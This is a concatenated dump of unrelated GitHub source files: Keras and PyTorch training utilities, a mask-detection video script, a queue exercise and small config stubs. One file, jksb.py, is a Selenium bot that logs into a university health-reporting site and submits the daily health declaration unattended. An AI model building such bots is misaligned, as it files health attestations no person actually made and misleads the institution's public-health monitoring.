sheet = wb.create_sheet('Temperature By City', 0)
# sheet header
sheet.cell(column=1, row=1, value='Year')
sheet.cell(column=2, row=1, value='Mean_Temperature')
sheet.cell(column=3, row=1, value='City')
#iterate through the d2 keys and values
next_row=2
val = []
for key, value in d2.items():
sheet.cell(column=1, row=next_row, value=key)
val.append(value)
for v in val:
sheet.cell(column=2, row=next_row, value=v[0])
sheet.cell(column=3, row=next_row, value=v[1])
next_row += 1
wb.save('World Temperature.xlsx')# Save the result to workbook
wb.close() # close workbook
| [
"gemju@github.com"
] | gemju@github.com |
1a606f42247d6ed08a5d7c4a7ac70c712737c38a | b9aabb13870b3707609fd2ea117870c2ad40c14b | /apps/accl_trn/03_trn_cnt.py | fea526ddb052242d3c8b61249c89bf799617e30f | [] | no_license | adpartin/pilot1 | d88d2af7d15df68780ab2f82169897a9c388a2fd | c99f32052fab0de210fd200b43194b19088dc3a7 | refs/heads/master | 2023-04-14T22:30:33.339975 | 2023-04-10T23:36:34 | 2023-04-10T23:36:34 | 160,101,290 | 1 | 0 | null | 2022-12-08T02:59:53 | 2018-12-02T22:10:10 | Jupyter Notebook | UTF-8 | Python | false | false | 14,014 | py | from __future__ import print_function, division
import warnings
warnings.filterwarnings('ignore')
# from comet_ml import Experiment
import os
import sys
from pathlib import Path
import argparse
import datetime
from time import time
from pprint import pprint
from glob import glob
import sklearn
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import keras as ke
from keras import backend as K
from keras.models import Sequential, Model, model_from_json, model_from_yaml, load_model
from keras.optimizers import SGD, Adam, RMSprop, Adadelta
from keras.utils import np_utils, multi_gpu_model
from keras.callbacks import Callback, ModelCheckpoint, CSVLogger, ReduceLROnPlateau, EarlyStopping
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split
from sklearn.model_selection import ShuffleSplit, KFold
from sklearn.model_selection import GroupShuffleSplit, GroupKFold
from sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold
SEED = None
t_start = time()
# Utils
import ml_models
from ml_models import r2_krs
import classlogger
import utils
# Import custom callbacks
keras_contrib = '/vol/ml/apartin/projects/keras-contrib/keras_contrib/callbacks'
sys.path.append(keras_contrib)
from cyclical_learning_rate import CyclicLR
# ep_vec = [int(x) for x in np.linspace(25, 175, 7)]
# ep_vec = [280, 240, 200, 160, 120, 80, 40]
# ep_vec = [300, 250, 200, 150, 100, 50]
ep_vec = [300, 200, 100]
# File path
# file_path = os.path.dirname(os.path.realpath(__file__))
file_path = Path(__file__).resolve().parent
# Path - create dir to dump results (AP)
PRJ_NAME = file_path.name
PRJ_DIR = file_path / '../../out' / PRJ_NAME
DATADIR = PRJ_DIR / 'data'
# Arg parser
psr = argparse.ArgumentParser(description='input agg csv file')
psr.add_argument('--ep', type=int, default=350, help='Total number of epochs.')
psr.add_argument('--attn', action='store_true', default=False, help='Whether to use attention layer.')
psr.add_argument('--split_by', type=str, choices=['cell', 'drug', 'both', 'none'],
default='cell',
help='Specify how to disjointly partition the dataset: \
`cell` (disjoint on cell), `drug` (disjoint on drug), \
`both` (disjoint on cell and drug), `none` (random split).')
# psr.add_argument('--ref_ep', type=int, default=350, help='Reference epoch.')
psr.add_argument('--ref_met', type=str, choices=['val_loss', 'val_mean_absolute_error'],
default='val_mean_absolute_error', help='Reference metric.')
psr.add_argument('--batch', type=int, default=32)
psr.add_argument('--dr', type=float, default=0.2)
psr.add_argument('--skp_ep', type=int, default=10, help='Number of epochs to skip when plotting training curves.')
psr.add_argument('--base_clr', type=float, default=1e-4, help='Base learning rate for cyclical learning rate.')
psr.add_argument('--max_clr', type=float, default=1e-3, help='Max learning rate for cyclical learning rate.')
args = vars(psr.parse_args())
pprint(args)
# Args
EPOCH = args['ep']
BATCH = args['batch']
DR = args['dr']
attn = args['attn'] # bool(args['attn'])
split_by = args['split_by']
# ref_ep = args['ref_ep']
ref_metric = args['ref_met']
skp_ep = args['skp_ep']
base_clr = args['base_clr']
max_clr = args['max_clr']
tr_phase = 'cnt'
if attn is True:
nn_type = 'attn'
else:
nn_type = 'fc'
# Path and outdir
wrmdir = PRJ_DIR / ('wrm' + '_' + nn_type) / ('split_by_' + split_by)
refdir = PRJ_DIR / ('ref' + '_' + nn_type) / ('split_by_' + split_by)
# data_path_tr = refdir / 'df_tr.parquet'
# data_path_te = refdir / 'df_te.parquet'
data_path_tr = DATADIR / ('split_by_' + split_by) / 'df_ref_tr.parquet'
data_path_te = DATADIR / ('split_by_' + split_by) / 'df_ref_te.parquet'
# outdir = PRJ_DIR / (tr_phase + '_' + nn_type + '_' + ref_metric) / ('split_by_' + split_by)
outdir = PRJ_DIR / (tr_phase + '_' + nn_type) / ('split_by_' + split_by)
os.makedirs(outdir, exist_ok=True)
# Dump args
utils.dump_args(args, outdir=outdir)
# Plot WRM vd REF curves
h_wrm = pd.read_csv(wrmdir/'krs_history.csv')
h_ref = pd.read_csv(refdir/'krs_history.csv')
val_cols_names = [c for c in h_ref.columns if 'val_' in c]
for c in val_cols_names:
fig, ax = plt.subplots()
ax.plot(h_ref['epoch'][skp_ep:], h_ref[c][skp_ep:], label=c+'_ref')
ax.plot(h_wrm['epoch'][skp_ep:], h_wrm[c][skp_ep:], label=c+'_wrm')
ax.set_xlabel('epoch')
ax.set_ylabel(c)
plt.legend(loc='best')
plt.grid(True)
plt.savefig(outdir/f'ref_vs_wrm_{c}.png', bbox_inches='tight')
# Number of training epochs of ref model
ref_ep = h_ref.shape[0]
# Create logger
logfilename = outdir/'logfile.log'
lg = classlogger.Logger(logfilename=logfilename)
# ---------
# Load data
# ---------
# We'll use the same data that was used to train the reference model
def load_data_prqt(data_path):
df = pd.read_parquet(data_path, engine='auto', columns=None)
df = df.sample(frac=1.0, axis=0, random_state=SEED)
return df
df_tr = load_data_prqt(data_path=data_path_tr)
df_te = load_data_prqt(data_path=data_path_te)
lg.logger.info('df_tr.shape: {}'.format(df_tr.shape))
lg.logger.info('df_te.shape: {}'.format(df_te.shape))
# Extract target and features
ytr, xtr = df_tr.iloc[:, 0], df_tr.iloc[:, 1:];
yte, xte = df_te.iloc[:, 0], df_te.iloc[:, 1:];
# Scale (use the scaler from the warm-up model)
scaler_path = wrmdir/'scaler.pkl'
scaler = joblib.load(scaler_path)
xtr = pd.DataFrame( scaler.transform(xtr) ).astype(np.float32)
xte = pd.DataFrame( scaler.transform(xte) ).astype(np.float32)
joblib.dump(scaler, outdir/'scaler.pkl')
# -----------------
# Get the ref score
# -----------------
# aa = pd.read_csv(refdir/'model.ref.log')
# score_ref = aa.loc[ref_ep-1, ref_metric]
# score_ref = aa[ref_metric].min()
# lg.logger.info(f'\n{ref_metric} at ref epoch {ref_ep}: {score_ref}')
x = h_ref[ref_metric].min()
lg.logger.info(f'\n{ref_metric} (min): {x.min()}')
prct_diff = 2
score_ref = x + x * prct_diff/100
lg.logger.info(f'{ref_metric} ({prct_diff}% from min): {score_ref}')
# ----------------------
# Train 'continue' model
# ----------------------
# Custom callback to stop training after reaching a target val_loss
class EarlyStoppingByMetric(Callback):
""" Custom callback that terminates training if a specific `monitor` metric reaches
a specific value indicated by `value`. For example: we want to terminate training reaches
val_loss of 0.05.
https://stackoverflow.com/questions/37293642/how-to-tell-keras-stop-training-based-on-loss-value
"""
def __init__(self, monitor='val_loss', value=0.00001, stop_when_below=True, verbose=0):
super(Callback, self).__init__()
self.monitor = monitor
self.value = value
self.verbose = verbose
self.stop_when_below = stop_when_below
def on_epoch_end(self, epoch, logs={}):
current = logs.get(self.monitor)
if current is None:
warnings.warn("Early stopping requires %s available!" % self.monitor, RuntimeWarning)
if self.stop_when_below:
if current <= self.value:
if self.verbose > 0:
print(f'Epoch {epoch:4d}: Early stopping, {self.monitor} threshold of {self.value}.')
self.model.stop_training = True
self.stopped_epoch = epoch
else:
if current >= self.value:
if self.verbose > 0:
print(f'Epoch {epoch:4d}: Early stopping, {self.monitor} threshold of {self.value}.')
self.model.stop_training = True
self.stopped_epoch = epoch
summary = {}
lg.logger.info('\n___ Iterate over weps ___')
for i, weps in enumerate(ep_vec):
# Load warm model
lg.logger.info(f'\nLoad warmed-up model with {weps} weps')
modelpath = glob(str(wrmdir/'models'/f'*ep_{weps}-*.h5'))[0]
model = load_model(modelpath, custom_objects={'r2_krs': r2_krs}) # https://github.com/keras-team/keras/issues/5916
# Compute ref_metric of wrm model
# lg.logger.info('Learning rate (wrm): {}'.format( K.eval(model.optimizer.lr)) )
score_wrm = model.evaluate(xte, yte, verbose=0)
score_wrm = score_wrm[ int(np.argwhere(h_ref.columns == ref_metric)) ]
lg.logger.info('{} (wrm): {}'.format(ref_metric, score_wrm))
# Reset learning rate to a new value
lr_new = 0.0005
model.compile(loss='mean_squared_error',
optimizer=SGD(lr=lr_new, momentum=0.9),
metrics=['mae', r2_krs])
# Create outdir for a specific value of weps
ep_dir = outdir/('weps_'+str(weps))
os.makedirs(ep_dir, exist_ok=True)
# Callbacks (custom)
tr_iters = xtr.shape[0]/BATCH
clr = CyclicLR(base_lr=base_clr, max_lr=max_clr, mode='triangular')
early_stop_custom = EarlyStoppingByMetric(monitor=ref_metric, value=score_ref,
stop_when_below=True, verbose=True)
# Keras callbacks
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.75, patience=15, verbose=1, mode='auto',
min_delta=0.0001, cooldown=3, min_lr=1e-9)
# reduce_lr = ReduceLROnPlateau(monitor=ref_metric, factor=0.75, patience=10, verbose=1, mode='auto',
# min_delta=0.0001, min_lr=1e-9)
early_stop = EarlyStopping(monitor=ref_metric, patience=50, verbose=1, mode='auto')
checkpointer = ModelCheckpoint(str(ep_dir/'model.h5'), verbose=0, save_weights_only=False, save_best_only=True)
csv_logger = CSVLogger(ep_dir/f'krs_logger.log')
# Callbacks list
callback_list = [checkpointer, csv_logger, early_stop, reduce_lr]
if 'clr' in opt_name: callback_list = callback_list + [clr]
# -----
# Train
# -----
# fit_params
fit_params = {'batch_size': BATCH, 'epochs': EPOCH, 'verbose': 1}
fit_params['validation_data'] = (xte, yte)
fit_params['callbacks'] = callback_list
# Train model (continue phase)
t0 = time()
history = model.fit(xtr, ytr, **fit_params)
runtime_ceps = time() - t0
# Save keras history
kh = ml_models.save_krs_history(history, ep_dir)
# ----------------------------------
# Results for the summary table/plot
# ----------------------------------
# Get ceps
ceps = len(history.epoch)
# Compute ref_metric of cnt model
score_cnt = kh.loc[len(kh)-1, ref_metric]
lg.logger.info('{} (cnt): {}'.format( ref_metric, score_cnt ))
#score_cnt = model.evaluate(xte, yte, verbose=0)
#score_cnt = score_cnt[ int(np.argwhere(h_ref.columns == ref_metric)) ]
# Bool that indicates if wrm model was converged to score_ref
# TODO: this is correct for error (not R^2)
converge = True if score_cnt <= score_ref else False
# Update summary table
summary[i] = (weps, ceps, score_wrm, score_cnt, runtime_ceps, converge)
lg.logger.info('converge: {}'.format(converge))
lg.logger.info('ceps: {} ({:.2f} mins)'.format( ceps, runtime_ceps/60 ))
# ----------
# Make plots
# ----------
# Plots
plts_path = ep_dir/'plts'
os.makedirs(plts_path, exist_ok=True)
ml_models.plot_prfrm_metrics(history=history, title='Continue training',
skp_ep=skp_ep, add_lr=True, outdir=plts_path)
# Plot reference training with continue training
for c in val_cols_names:
fig, ax = plt.subplots(figsize=(8, 6))
x1 = list(h_ref['epoch'])
x2 = list(kh['epoch'] + weps)
ax.plot(x1, h_ref[c], 'b-', linewidth=1.5, alpha=0.7, label='ref')
# ax.plot(x2, kh[c], 'ro-', markersize=2, alpha=0.7, label=f'weps_{weps}')
ax.plot(x2, kh[c], 'r-', linewidth=1.5, alpha=0.7, label=f'weps_{weps}')
if c == ref_metric:
# x = range(0, max(x1+x2))
# ymin = np.ones(len(x)) * min(h_ref[c])
# yref = np.ones(len(x)) * score_ref
# ax.plot(x, ymin, 'k--', linewidth=1, alpha=0.7, label='ref_min')
# ax.plot(x, yref, 'g--', linewidth=1, alpha=0.7, label=f'ref_min_{prct_diff}%')
ax.axhline(min(h_ref[c]), 'k--', linewidth=1, alpha=0.7, label='ref_min')
ax.axhline(score_ref, 'g--', linewidth=1, alpha=0.7, label=f'ref_min_{prct_diff}%')
ax.set_xlabel('epoch')
ax.set_ylabel(c)
plt.title(f'ceps: {ceps}')
plt.legend(loc='best')
plt.grid(True)
plt.savefig(ep_dir/f'ref_vs_cnt_({c}).png', bbox_inches='tight')
del fig, ax
lg.logger.info('\n' + '_'*70)
columns = ['weps', 'ceps', f'{ref_metric}_wrm', f'{ref_metric}_cnt', 'runtime_sec', 'converge']
summary = pd.DataFrame.from_dict(summary, orient='index', columns=columns)
summary.to_csv(outdir/'summary.csv', index=False)
lg.logger.info(summary)
# Final plot
fig, ax1 = plt.subplots()
# Add ceps plot
ax1.plot(summary['weps'], summary['ceps'], '-ob')
ax1.set_xlabel('weps')
ax1.set_ylabel('ceps', color='b')
ax1.tick_params('y', colors='b')
ax1.grid(True)
# Add runtime plot
# ax2 = ax1.twinx()
# ax2.plot(summary['weps'], summary['runtime_sec'], '-om')
# ax2.set_ylabel('runtime', color='m')
# ax2.tick_params('y', colors='m')
fig.tight_layout()
# plt.title('Reference {} at {} epoch'.format(ref_metric, ref_ep))
# plt.title(f'Ref epochs: {ref_ep}; Diff from min score: {prct_diff}%')
plt.title(f'Diff from min score: {prct_diff}%')
plt.savefig(outdir/'summary_plot.png', bbox_inches='tight')
lg.logger.info('\nMax speed-up: {}/{}={:.2f}'.format( ref_ep, summary['ceps'].min(), ref_ep/summary['ceps'].min()) )
lg.logger.info('Max epochs reduced: {}-{}={}'.format( ref_ep, summary['ceps'].min(), ref_ep-summary['ceps'].min()) )
lg.logger.info('\nProgram runtime: {:.2f} mins'.format( (time() - t_start)/60 ))
lg.logger.info('Done.')
| [
"apartin@lambda-quad.cels.anl.gov"
] | apartin@lambda-quad.cels.anl.gov |
236b27551e02af95c808dc72d6db595e4fba42b8 | 80352272be7b7806e592ed35e59920845d9adb69 | /BOJ-10845.py | 929abbf2859e8a5868ce67921c920821ec3edede | [] | no_license | songda515/algorithm | 14635609df9efc7e4aa396df7309b0eebae331b5 | fc64e6115088ac52d83b93129da6ec0efac1874f | refs/heads/master | 2023-04-13T22:22:39.284686 | 2021-04-21T09:34:53 | 2021-04-21T09:34:53 | 337,151,557 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | from sys import stdin
input = stdin.readline
n = int(input())
queue = []
for _ in range(n):
command = input().strip()
if command == 'pop':
if queue:
print(queue.pop(0))
else:
print(-1)
elif command == 'size':
print(len(queue))
elif command == 'empty':
if queue:
print(0)
else:
print(1)
elif command == 'front':
if queue:
print(queue[0])
else:
print(-1)
elif command == 'back':
if queue:
print(queue[-1])
else:
print(-1)
else:
queue.append(command.split()[-1]) | [
"songda515@gmail.com"
] | songda515@gmail.com |
d67dac80927b5d7deb7ec474c16d1403bc5bd4a9 | f877e8617f6ac8b5c742ebec1770b36065a74189 | /build/assignment_04/catkin_generated/pkg.installspace.context.pc.py | b085dfd7a6ae81ad86f1052d7b475b370e120dc6 | [] | no_license | bolduc-drew/AUE893_Bolduc | 3869e793da11e73bd8e9f113a055e53920d94cf8 | f05d44266e918eb455085b8648367eef517df2c5 | refs/heads/master | 2021-01-25T05:56:44.619906 | 2017-04-27T21:01:11 | 2017-04-27T21:01:11 | 80,707,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "assignment_04"
PROJECT_SPACE_DIR = "/home/bolduc/AUE893_Bolduc/install"
PROJECT_VERSION = "0.0.0"
| [
"abolduc@g.clemson.edu"
] | abolduc@g.clemson.edu |
884168216b4d61ff82fc3872da8789d20fad0f33 | 7fcde04f3bae3430085d5909f274ef670591a04e | /pluto_drone/plutodrone/src/pd.py | 4dd2f7445c5723ebf61108e03e1e5bad662cf9cb | [] | no_license | sjoshi13/Hungry-Bird-eYRC-2018- | ddbf7f264ade40bbb7af01242c75270df6a7a475 | 2e5c6c7d7c9fe12488dcfcbcf155d624554ef5cd | refs/heads/master | 2020-05-03T22:59:49.804532 | 2019-04-01T12:11:54 | 2019-04-01T12:11:54 | 178,854,820 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | import csv
print(5)
f=open('j.csv','r')
print('shruti')
| [
"shruti03.joshi@gmail.com"
] | shruti03.joshi@gmail.com |
d348351ef092461e7fb46671aa00975b45ff828d | 67f858f723d9114462467ad15811d321c369a5a1 | /jksb.py | 276478d63e9e3e1d0385991d9e4b12371d63f579 | [] | no_license | xiaozixiaopingzi/zzu-jksb | 280097965d2bc4e8ed654a7de95b417abfce8322 | 66f9b2b3faef8a6e0ae4730fc7b99880bbcce64a | refs/heads/master | 2022-11-20T11:29:38.710409 | 2020-07-27T16:55:35 | 2020-07-27T16:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | #encoding:UTF-8
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait as wait
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as ec
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.support.select import Select
import sys
import os
import requests
import time
import re
def Wechat(title,content):
api = "https://sc.ftqq.com/"+os.environ["api"]+".send"
data = {
"text" : title,
"desp" : content
}
req = requests.post(api, data = data)
class Log:
def __init__(self):
self.uid = os.environ["username"]
self.pwd = os.environ["password"]
self.i = 1
#self.fp = open(r"C:\today.txt", 'a+', encoding='utf8')
def login(self):
try:
mobile = {"deviceName":"iPhone X"}
option = webdriver.ChromeOptions()
option.add_experimental_option('mobileEmulation', mobile)
option.add_argument('--disable-infobars')
option.add_argument("--disable-extensions")
option.add_argument("--disable-gpu")
option.add_argument("--disable-dev-shm-usage")
option.add_argument("--no-sandbox")
option.add_argument("--headless")
#如果配置环境变量可以不写绝对路径
wd = webdriver.Chrome(chrome_options=option)
wd.set_window_size(600 , 800)
wd.get("http://jksb.zzu.edu.cn/")
wd.switch_to.frame(0)
try:
wait(wd , 10 ,poll_frequency=0.5).until(ec.presence_of_element_located((By.NAME , 'uid'))).send_keys(self.uid)
time.sleep(0.5)
wait(wd , 10, poll_frequency=0.5).until(ec.visibility_of_element_located((By.NAME , "upw"))).send_keys(self.pwd)
time.sleep(0.5)
wait(wd , 10 , poll_frequency=0.5).until(ec.element_to_be_clickable((By.XPATH,".//div[@class='mt_3e']/input"))).submit()
time.sleep(0.5)
# wd.switch_to.frame('zzj_top_6s')
# time.sleep(0.5)
except TimeoutException :
raise TimeoutError
#切入frame
wd.switch_to.frame('zzj_top_6s')
time.sleep(0.5)
init = wait(wd , 10 ,poll_frequency=0.5).until(ec.presence_of_element_located((By.XPATH , '//*[@id="bak_0"]/div[7]/span')))
init_text = init.text
if '已经填报' in init_text:
# if '1' in init_text:
#self.fp.writelines(u"{} --> 打卡成功 -->已填报过了 无需重复填写 ^_^ \n ".format(time.strftime("%Y-%m-%d %H : %M: %S", time.localtime())))
print(u"{} 已完成上报啦 ,无需重复啦 ^_^ ".format(time.strftime("%Y-%m-%d %H : %M: %S", time.localtime())))
time.sleep(5)
sys.exit()
else:
wait(wd ,10 ,poll_frequency=1).until(ec.element_to_be_clickable((By.XPATH , '//*[@id="bak_0"]/div[13]/div[3]/div[4]'))).click()
# Select(wd.find_element_by_xpath('//*[@id="bak_0"]/div[8]/select')).select_by_value("正常")
# wait(wd, 10, poll_frequency=0.5).until(ec.element_to_be_clickable((By.XPATH, '//*[@id="bak_0"]/div[13]/div[4]/span'))).click()
wait(wd, 10, poll_frequency=0.5).until(ec.element_to_be_clickable((By.XPATH, '//*[@id="bak_0"]/div[19]/div[4]/span'))).click()
# notis = wd.find_element_by_xpath('//*[@id="bak_0"]/div[2]/div[2]/div[2]/div[2]').text
notis = wd.find_element_by_xpath('//*[@id="bak_0"]/div[2]').text
# pattern = re.compile(r"感谢您向学校上报健康状况")
pattern = re.compile(r"感谢你今日上报健康状况!")
confirm = re.findall(pattern, notis)#
if confirm :
today = "{} --> 打卡成功 --> ^_^\n".format(str(time.strftime(u"%Y-%m-%d %H : %M: %S", time.localtime())))
print(today)
Wechat("打卡成功",today)
#self.fp.writelines(today)
time.sleep(3)
else:
raise TimeoutError
# wd.quit()
except (TimeoutError,SessionNotCreatedException):
while 1:
if self.i <= 3:
error = u"{} --> 打卡失败 --> 已进行第{}次重试 (┬_┬) \n".format(str(time.strftime(u"%Y-%m-%d %H : %M: %S", time.localtime())) , str(self.i))
#self.fp.writelines(error)
print(error)
self.i+=1
try:
# wd.close()
wd.quit()
except:
pass
time.sleep(4)
self.login()
else:
error2 = u"{} --> 打卡失败 --> 已尝试{}次且未成功 , 打卡失败请重试!! (┬_┬) \n".format(str(time.strftime(u"%Y-%m-%d %H : %M: %S", time.localtime())) , str(self.i))
#self.fp.writelines(error2)
print(error2)
Wechat("打卡失败",error2)
break
finally:
try:
wd.quit()
except:
pass
#self.fp.close()
if __name__ == "__main__":
loging = Log()
loging.login()
| [
"noreply@github.com"
] | xiaozixiaopingzi.noreply@github.com |
238bcfb1c6807d7ec0bef0ae67ea5120c805ac69 | 14ad9a1dc0d0c8529a856baf3456e597c19319b0 | /video.py | 26d012ab317c30401d22af65461baca1e2a72bb9 | [] | no_license | isp5708/hackerTone_ABC | 6ffdc43692842142fbaa18bd79d8d73132d4d149 | 86d5df147963d094ec36ebd20ca06697b88b077b | refs/heads/master | 2023-01-23T01:57:46.609486 | 2020-11-19T10:54:07 | 2020-11-19T10:54:07 | 314,190,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,101 | py | from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.models import load_model
import numpy as np
import cv2
import matplotlib.pyplot as plt
import os
facenet = cv2.dnn.readNet('models/deploy.prototxt', 'models/res10_300x300_ssd_iter_140000.caffemodel')
model = load_model('models/mask_detector.model')
cap = cv2.VideoCapture('models/hihi.mp4')
ret, img = cap.read()
fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')
out = cv2.VideoWriter('output.mp4', fourcc, cap.get(cv2.CAP_PROP_FPS), (img.shape[1], img.shape[0]))
while cap.isOpened():
ret, img = cap.read()
if not ret:
break
h, w = img.shape[:2]
blob = cv2.dnn.blobFromImage(img, scalefactor=1., size=(300, 300), mean=(104., 177., 123.))
facenet.setInput(blob)
dets = facenet.forward()
result_img = img.copy()
for i in range(dets.shape[2]):
confidence = dets[0, 0, i, 2]
if confidence < 0.5:
continue
x1 = int(dets[0, 0, i, 3] * w)
y1 = int(dets[0, 0, i, 4] * h)
x2 = int(dets[0, 0, i, 5] * w)
y2 = int(dets[0, 0, i, 6] * h)
face = img[y1:y2, x1:x2]
face_input = cv2.resize(face, dsize=(224, 224))
face_input = cv2.cvtColor(face_input, cv2.COLOR_BGR2RGB)
face_input = preprocess_input(face_input)
face_input = np.expand_dims(face_input, axis=0)
mask, nomask = model.predict(face_input).squeeze()
if mask > 0.9:
color = (0, 255, 0)
label = 'Mask %d%%' % (mask * 100)
elif nomask >0.9:
color = (0, 0, 255)
label = 'No Mask %d%%' % (nomask * 100)
cv2.rectangle(result_img, pt1=(x1, y1), pt2=(x2, y2), thickness=2, color=color, lineType=cv2.LINE_AA)
cv2.putText(result_img, text=label, org=(x1, y1 - 10), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.8,
color=color, thickness=2, lineType=cv2.LINE_AA)
out.write(result_img)
cv2.imshow('result', result_img)
if cv2.waitKey(1) == ord('q'):
break
out.release()
cap.release()
| [
"dlwnsdud3737@naver.com"
] | dlwnsdud3737@naver.com |
cce8b4daf14e7d369b29433a23c878b1b5cfccc6 | 5a84db9a25bfaab6f70bbe92464ee2cd6a6fc523 | /radtorch/modelsutils.py | eafa725b96a42e8dc11f996eab77977bddc79120 | [
"MIT"
] | permissive | kareemelfatairy/radtorch | 712424e6a95d29aa5ca388e2e499389b995e228a | 539d8accdc405a94e2ed3c0c770c8341de00ee05 | refs/heads/master | 2021-01-13T18:02:38.368814 | 2020-02-22T23:54:26 | 2020-02-22T23:54:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,792 | py | import torch, torchvision, datetime, time, pickle, pydicom, os
import torchvision.models as models
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torchvision.datasets as datasets
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn import metrics
from tqdm import tqdm_notebook as tqdm
from torch.utils.data.dataset import Dataset
from torchvision import transforms
from PIL import Image
from pathlib import Path
from radtorch.dicomutils import dicom_to_pil
model_dict = {'vgg16':{'name':'vgg16','input_size':244, 'output_features':4096},
'vgg19':{'name':'vgg19','input_size':244, 'output_features':4096},
'resnet50':{'name':'resnet50','input_size':244, 'output_features':2048},
'resnet101':{'name':'resnet101','input_size':244, 'output_features':2048},
'resnet152':{'name':'resnet152','input_size':244, 'output_features':2048},
'wide_resnet50_2':{'name':'wide_resnet50_2','input_size':244, 'output_features':2048},
'wide_resnet101_2':{'name':'wide_resnet101_2','input_size':244, 'output_features':2048},
}
loss_dict = {
'NLLLoss':torch.nn.NLLLoss(),
'CrossEntropyLoss':torch.nn.CrossEntropyLoss(),
'MSELoss':torch.nn.MSELoss(),
'PoissonNLLLoss': torch.nn.PoissonNLLLoss(),
'BCELoss': torch.nn.BCELoss(),
'BCEWithLogitsLoss': torch.nn.BCEWithLogitsLoss(),
'MultiLabelMarginLoss':torch.nn.MultiLabelMarginLoss(),
'SoftMarginLoss':torch.nn.SoftMarginLoss(),
'MultiLabelSoftMarginLoss':torch.nn.MultiLabelSoftMarginLoss(),
}
supported_models = [x for x in model_dict.keys()]
supported_losses = [x for x in loss_dict.keys()]
def supported_list():
'''
Returns a list of the currently supported network architectures and loss functions.
.. image:: pass.jpg
'''
print ('Supported Network Architectures:')
for i in supported_models:
print (i)
print('')
print ('Supported Loss Functions:')
for i in supported_losses:
print (i)
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
def create_model(model_arch, input_channels, output_classes, pre_trained=True):
'''
Creates a PyTorch training neural network model with specified network architecture. Input channels and output classes can be specified.
Inputs:
model_arch: [str] The architecture of the model neural network. Examples include 'vgg16', 'resnet50', and 'resnet152'.
pre_trained: [boolen] Load the pretrained weights of the neural network.(default=True)
input_channels: [int] Number of input image channels. Grayscale DICOM images usually have 1 channel. Colored images have 3.
output_classes: [int] Number of output classes for image classification problems.
Outputs:
Output: [PyTorch neural network object]
Examples:
```
my_model = radtorch.model.create_model(model_arch='vgg16',input_channels=1, output_classes=2, pre_trained=True)
```
.. image:: pass.jpg
'''
if model_arch not in supported_models:
print ('Error! Provided model architecture is not supported yet. For complete list of supported models please type radtorch.modelsutils.model_list()')
else:
if model_arch == 'vgg16' or model_arch == 'vgg19':
if model_arch == 'vgg16':
train_model = torchvision.models.vgg16(pretrained=pre_trained)
elif model_arch == 'vgg19':
train_model = torchvision.models.vgg19(pretrained=pre_trained)
train_model.features[0] = nn.Conv2d(input_channels,64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
train_model.classifier[6] = nn.Sequential(
nn.Linear(in_features=4096, out_features=output_classes, bias=True))
elif model_arch == 'resnet50' or model_arch == 'resnet101' or model_arch == 'resnet152' or model_arch == 'wide_resnet50_2' or model_arch == 'wide_resnet101_2':
if model_arch == 'resnet50':
train_model = torchvision.models.resnet50(pretrained=pre_trained)
elif model_arch == 'resnet101':
train_model = torchvision.models.resnet101(pretrained=pre_trained)
elif model_arch == 'resnet152':
train_model = torchvision.models.resnet152(pretrained=pre_trained)
elif model_arch == 'wide_resnet50_2':
train_model = torchvision.models.wide_resnet50_2(pretrained=pre_trained)
elif model_arch == 'wide_resnet101_2':
train_model = torchvision.models.wide_resnet101_2(pretrained=pre_trained)
train_model.conv1 = nn.Conv2d(input_channels,64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
fc_inputs = train_model.fc.in_features
train_model.fc = nn.Sequential(
nn.Linear(fc_inputs, output_classes))
return train_model
def create_loss_function(type):
'''
Creates a PyTorch training loss function object.
Inputs:
type: [str] type of the loss functions required.
Outputs:
Output: [PyTorch loss function object]
.. image:: pass.jpg
'''
if type not in supported_losses:
print ('Error! Provided loss function is not supported yet. For complete list of supported models please type radtorch.modelsutils.supported_list()')
else:
loss_function = loss_dict[type]
return loss_function
def train_model(model, train_data_loader, valid_data_loader, train_data_set, valid_data_set,loss_criterion, optimizer, epochs, device):
'''
Trains a Neural Network Model
Inputs:
model: [PyTorch neural network object] Model to be trained.
train_data_loader: [PyTorch dataloader object] training data dataloader.
valid_data_loader: [PyTorch dataloader object] validation data dataloader.
train_data_loader: [PyTorch dataset object] training data dataset.
valid_data_loader: [PyTorch dataset object] validation data dataset.
loss_criterion: [PyTorch nn object] Loss function to be used during training.
optimizer: [PyTorch optimizer object] Optimizer to be used during training.
epochs: [int] training epochs.
device: [str] device to be used for training (default='cpu'). This can be 'cpu' or 'cuda'.
Outputs:
model: [PyTorch neural network object] trained model.
train_metrics: [list] list of np arrays of training loss and accuracy.
Examples:
```
```
.. image:: pass.jpg
'''
start_time = datetime.datetime.now()
training_metrics = []
print ('Starting training at '+ str(start_time))
model = model.to(device)
for epoch in tqdm(range(epochs)):
epoch_start = time.time()
# Set to training mode
model.train()
